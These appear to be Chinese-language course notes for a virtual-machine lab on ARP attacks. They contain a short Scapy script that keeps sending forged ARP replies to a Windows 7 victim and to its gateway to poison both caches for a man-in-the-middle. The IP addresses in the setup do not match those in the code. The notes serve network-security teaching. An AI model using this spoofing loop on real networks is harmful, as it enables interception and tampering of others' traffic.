目录
课程目标
课程实验
课程引入
授课进程
一、ARP攻击
1.配置实验环境
win7:被攻击主机 IP:192.168.80.129 MAC:00:0C:29:63:C4:68
kali:攻击主机 IP:192.168.80.80 MAC:00:0c:29:3e:1d:5c
网关:IP:192.168.80.2 MAC:00:50:56:e4:34:d7 (arp -a)查询
二、ARP欺骗
三、使用Scarpy完成ARP欺骗
# 攻击主机告诉被攻击主机,我是网关,告诉网关,我是被攻击主机。
def arp_spoof():
iface = "VMware Virtual Ethernet Adapter for VMnet8"
# 被攻击主机的MAC和IP, Windows7
target_ip = '192.168.112.130'
target_mac = '00:0c:29:fd:b9:7e'
# 攻击主机的MAC和IP, Kali
spoof_ip = '192.168.112.148'
spoof_mac = '00:0c:29:5e:0a:00'
# 真实网关的MAC和IP
gateway_ip = '192.168.112.2'
geteway_mac = getmacbyip(gateway_ip)
# 构造两个数据包,实现对被攻击主机和网关的欺骗
while True:
# 欺骗被攻击主机:op=1: ARP请求, op=2:ARP响应
packet = Ether(src=spoof_mac, dst=target_mac)/ARP(hwsrc=spoof_mac, psrc=gateway_ip, hwdst=target_mac, pdst=target_ip, op=2)
sendp(packet, iface=iface)
# 欺骗网关
packet = Ether(src=spoof_mac, dst=geteway_mac)/ARP(hwsrc=spoof_mac, psrc=target_ip, hwdst=geteway_mac, pdst=gateway_ip, op=2)
sendp(packet, iface=iface)
time.sleep(1)